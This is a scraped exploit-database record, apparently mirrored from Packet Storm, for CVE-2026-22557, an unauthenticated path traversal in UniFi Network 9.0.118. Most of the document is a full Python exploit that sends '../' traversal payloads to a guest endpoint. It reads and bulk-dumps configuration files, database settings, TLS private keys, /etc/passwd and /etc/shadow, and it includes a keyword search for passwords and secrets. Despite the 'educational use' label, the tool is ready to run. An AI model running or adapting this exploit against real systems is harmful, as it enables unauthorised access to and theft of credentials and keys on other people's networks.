{“lastseen”:”2026-06-10T15:35:30″,”description”:”UniFi Network version9.0.118 suffers from a path traversal vulnerability that can lead to arbitrary file disclosure…”,”published”:”2026-06-10T00:00:00″,”modified”:”2026-06-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 UniFi Network 9.0.118 Path Traversal \/ File Disclosure”,”source”:””,”references”:””,”id”:”PACKETSTORM:223077″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-22557″],”sourceData”:”==================================================================================================================================\\n | # Title : UniFi Network 9.0.118 Advanced Unauthenticated Path Traversal |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/ui.com\/ |\\n ==================================================================================================================================\\n \\n [+] Summary : security assessment tool targeting a reported path traversal vulnerability (CVE-2026-22557) in the UniFi Network Application. \\n It attempts to verify whether a UniFi instance is vulnerable to unauthenticated file disclosure through a specific endpoint.\\n \\n \\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\n import argparse\\n import requests\\n import urllib3\\n import sys\\n import json\\n import re\\n from urllib.parse import urljoin\\n \\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\n \\n class UniFiExploit:\\n def __init__(self, target: str, site: str = \\”default\\”, depth: int = 8, verify_ssl: bool = False):\\n self.target = target.rstrip(‘\/’)\\n self.site = site\\n self.depth = depth\\n self.verify_ssl = verify_ssl\\n self.session = requests.Session()\\n self.session.headers.update({\\n ‘User-Agent’: ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’\\n })\\n self.vuln_endpoint = f\\”\/guest\/s\/{self.site}\/wechat\/sign\\”\\n self.sensitive_files = {\\n ‘system.properties’: ‘opt\/unifi\/data\/system.properties’,\\n ‘mongodb.properties’: ‘opt\/unifi\/data\/mongodb.properties’,\\n ‘keystore’: ‘opt\/unifi\/data\/keystore’,\\n ‘server.log’: ‘opt\/unifi\/logs\/server.log’,\\n ‘unifi.log’: ‘opt\/unifi\/logs\/unifi.log’,\\n ‘mongod.log’: ‘opt\/unifi\/logs\/mongod.log’,\\n ‘ssl_cert’: ‘opt\/unifi\/cert\/cert.pem’,\\n ‘ssl_key’: ‘opt\/unifi\/cert\/key.pem’,\\n ‘passwd’: ‘etc\/passwd’,\\n ‘hostname’: ‘etc\/hostname’,\\n ‘os-release’: ‘etc\/os-release’,\\n }\\n def read_file(self, file_path: str) -\\u003e tuple:\\n \\”\\”\\”\\n Read a file using Path Traversal\\n Returns:\\n (success: bool, content: str, error: str)\\n \\”\\”\\”\\n traversal = \\”..\/\\” * self.depth\\n payload = traversal + file_path.lstrip(‘\/’)\\n url = urljoin(self.target, self.vuln_endpoint)\\n try:\\n response = self.session.get(\\n url,\\n params={‘page_error’: payload},\\n verify=self.verify_ssl,\\n timeout=15\\n )\\n if response.status_code == 200:\\n content = response.text\\n html_indicators = [‘\\u003c!DOCTYPE’, ‘\\u003chtml’, ‘\\u003cunifi’, ‘\\u003cdiv’, ‘\\u003cbody’]\\n if any(indicator.lower() in content[:200].lower() for indicator in html_indicators):\\n return False, None, \\”HTML response (file not found or insufficient depth)\\”\\n if len(content) \\u003e 0:\\n return True, content, None\\n else:\\n return False, None, \\”File is empty\\”\\n elif response.status_code == 404:\\n return False, None, \\”File not found (404)\\”\\n else:\\n return False, None, f\\”HTTP {response.status_code}\\”\\n except requests.exceptions.Timeout:\\n return False, None, \\”Timeout reached\\”\\n except requests.exceptions.ConnectionError as e:\\n return False, None, f\\”Connection error: {e}\\”\\n except Exception as e:\\n return False, None, str(e)\\n \\n def test_vulnerability(self) -\\u003e bool:\\n \\”\\”\\”Test whether the target is vulnerable\\”\\”\\”\\n print(f\\”[*] Testing vulnerability on {self.target} (Site: {self.site})\\”)\\n success, content, error = self.read_file(‘opt\/unifi\/data\/system.properties’)\\n if success and content and ‘unifi’ in content.lower():\\n print(f\\”[+] Target is vulnerable! Vulnerability confirmed.\\”)\\n preview = content[:200].replace(‘\\\\n’, ‘ ‘).strip()\\n print(f\\”[*] Preview: {preview[:150]}…\\”)\\n return True\\n else:\\n print(f\\”[-] Target does not appear to be vulnerable: {error}\\”)\\n return False\\n \\n def dump_file(self, file_path: str, output_file: str = None):\\n \\”\\”\\”Read a file and save it locally\\”\\”\\”\\n print(f\\”[*] Attempting to read: {file_path}\\”)\\n success, content, error = self.read_file(file_path)\\n \\n if success and content:\\n if output_file is None:\\n output_file = file_path.replace(‘\/’, ‘_’)\\n try:\\n with open(output_file, ‘w’, encoding=’utf-8′, errors=’ignore’) as f:\\n f.write(content)\\n print(f\\”[+] Saved {len(content)} bytes to {output_file}\\”)\\n return True\\n except Exception as e:\\n print(f\\”[-] Saving error: {e}\\”)\\n return False\\n else:\\n print(f\\”[-] Read failed: {error}\\”)\\n return False\\n def dump_all_sensitive(self, output_dir: str = \\”unifi_dump\\”):\\n \\”\\”\\”Read all sensitive files\\”\\”\\”\\n import os\\n os.makedirs(output_dir, exist_ok=True)\\n print(f\\”\\\\n[*] Starting configuration dump to {output_dir}\/\\”)\\n print(\\”-\\” * 50)\\n results = {}\\n for name, path in self.sensitive_files.items():\\n output_file = os.path.join(output_dir, name)\\n success = self.dump_file(path, output_file)\\n results[name] = success\\n print(\\”\\\\n\\” + \\”=\\” * 50)\\n print(\\”Dump Summary:\\”)\\n for name, success in results.items():\\n status = \\”\u2713\\” if success else \\”\u2717\\”\\n print(f\\” {status} {name}\\”)\\n return results\\n def search_keywords(self, keywords: list, file_paths: list = None) -\\u003e dict:\\n \\”\\”\\”Search for specific keywords within files\\”\\”\\”\\n if file_paths is None:\\n file_paths = list(self.sensitive_files.values())\\n results = {}\\n for file_path in file_paths:\\n success, content, error = self.read_file(file_path)\\n if success and content:\\n found = []\\n for keyword in keywords:\\n if keyword.lower() in content.lower():\\n lines = content.split(‘\\\\n’)\\n context = []\\n for i, line in enumerate(lines):\\n if keyword.lower() in line.lower():\\n context.append(f\\” L{i+1}: {line.strip()[:100]}\\”)\\n found.append({\\n ‘keyword’: keyword,\\n ‘context’: context[:3] \\n })\\n if found:\\n results[file_path] = found\\n return results\\n def banner():\\n print(\\”\\”\\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 CVE-2026-22557 – UniFi Network Path Traversal Exploit \u2551\\n \u2551 Unauthenticated File Read – For Educational Use Only \u2551\\n \u2551 by indoushka \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n \\”\\”\\”)\\n def main():\\n banner()\\n parser = argparse.ArgumentParser(\\n description=\\”Exploiting Path Traversal vulnerability in UniFi Network Application\\”,\\n formatter_class=argparse.RawDescriptionHelpFormatter,\\n epilog=\\”\\”\\”\\n Usage Examples:\\n %(prog)s https:\/\/192.168.1.100:8443 –test\\n %(prog)s https:\/\/192.168.1.100:8443 –read etc\/passwd\\n %(prog)s https:\/\/192.168.1.100:8443 –dump-all\\n %(prog)s https:\/\/192.168.1.100:8443 –site hotel –read opt\/unifi\/data\/system.properties\\n %(prog)s https:\/\/192.168.1.100:8443 –search \\”password,secret,key\\”\\n %(prog)s https:\/\/192.168.1.100:8443 –depth 12 –read etc\/shadow\\n \\n Important Sensitive Files:\\n \u2022 opt\/unifi\/data\/system.properties – Main system configurations\\n \u2022 opt\/unifi\/data\/mongodb.properties – Database connection details\\n \u2022 opt\/unifi\/data\/keystore – TLS Certificates\\n \u2022 opt\/unifi\/logs\/server.log – Server logs\\n \u2022 etc\/passwd – System users\\n \u2022 etc\/shadow – Encrypted passwords (requires root)\\n \\”\\”\\”\\n )\\n parser.add_argument(\\”target\\”, help=\\”Target URL (e.g., https:\/\/192.168.1.100:8443)\\”)\\n parser.add_argument(\\”–site\\”, default=\\”default\\”, help=\\”UniFi site name (Default: default)\\”)\\n parser.add_argument(\\”–depth\\”, type=int, default=8, help=\\”Number of ..\/ repetitions (Default: 8)\\”)\\n parser.add_argument(\\”–read\\”, \\”-r\\”, help=\\”Read a specific file\\”)\\n parser.add_argument(\\”–test\\”, action=\\”store_true\\”, help=\\”Test vulnerability status\\”)\\n parser.add_argument(\\”–dump-all\\”, action=\\”store_true\\”, help=\\”Dump all sensitive configurations\\”)\\n parser.add_argument(\\”–search\\”, \\”-s\\”, help=\\”Search for keywords (comma-separated)\\”)\\n parser.add_argument(\\”–output-dir\\”, \\”-o\\”, default=\\”unifi_dump\\”, help=\\”Directory to save dumped files\\”)\\n parser.add_argument(\\”–insecure\\”, action=\\”store_true\\”, help=\\”Ignore SSL certificate errors\\”)\\n parser.add_argument(\\”–list-files\\”, action=\\”store_true\\”, help=\\”Show list of available target files\\”) \\n args = parser.parse_args()\\n if args.list_files:\\n print(\\”\\\\nTargetable sensitive files:\\”)\\n print(\\”-\\” * 40)\\n exploit = UniFiExploit(args.target, args.site, args.depth, args.insecure)\\n for name, path in exploit.sensitive_files.items():\\n print(f\\” {name:20} -\\u003e {path}\\”)\\n return\\n exploit = UniFiExploit(args.target, args.site, args.depth, args.insecure)\\n print(f\\”\\\\n[*] Target: {args.target}\\”)\\n print(f\\”[*] Site: {args.site}\\”)\\n print(f\\”[*] Traversal Depth: {args.depth}\\”)\\n print()\\n \\n if args.test:\\n if exploit.test_vulnerability():\\n print(\\”\\\\n[!] Target is vulnerable! You can run:\\”)\\n print(f\\” python3 {sys.argv[0]} {args.target} –read opt\/unifi\/data\/system.properties\\”)\\n else:\\n print(\\”\\\\n[-] Target might not be vulnerable. Try:\\”)\\n print(f\\” 1. Increasing depth: –depth 12\\”)\\n print(f\\” 2. Changing site name: –site site_name\\”)\\n print(f\\” 3. Verifying URL format and port\\”)\\n return\\n if args.dump_all:\\n exploit.dump_all_sensitive(args.output_dir)\\n return\\n if args.search:\\n keywords = [k.strip() for k in args.search.split(‘,’)]\\n print(f\\”[*] Searching for: {‘, ‘.join(keywords)}\\”)\\n results = exploit.search_keywords(keywords)\\n if results:\\n print(\\”\\\\n[+] Search Results:\\”)\\n for file_path, found in results.items():\\n print(f\\”\\\\n {file_path}:\\”)\\n for item in found:\\n print(f\\” ‘{item[‘keyword’]}’:\\”)\\n for line in item[‘context’]:\\n print(f\\” {line}\\”)\\n else:\\n print(\\”[-] No matching results found\\”)\\n return\\n if args.read:\\n exploit.dump_file(args.read)\\n return\\n parser.print_help()\\n if __name__ == \\”__main__\\”:\\n try:\\n main()\\n except KeyboardInterrupt:\\n print(\\”\\\\n[!] Execution stopped by user\\”)\\n sys.exit(1)\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/223077″,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/223077\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-10T15:35:30″,”description”:”UniFi Network version9.0.118 suffers from a path traversal vulnerability that can lead to arbitrary file disclosure…”,”published”:”2026-06-10T00:00:00″,”modified”:”2026-06-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 UniFi Network 9.0.118 Path Traversal \/ File Disclosure”,”source”:””,”references”:””,”id”:”PACKETSTORM:223077″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-22557″],”sourceData”:”==================================================================================================================================\\n |…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,13,53,7,11,5],"class_list":["post-61670","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n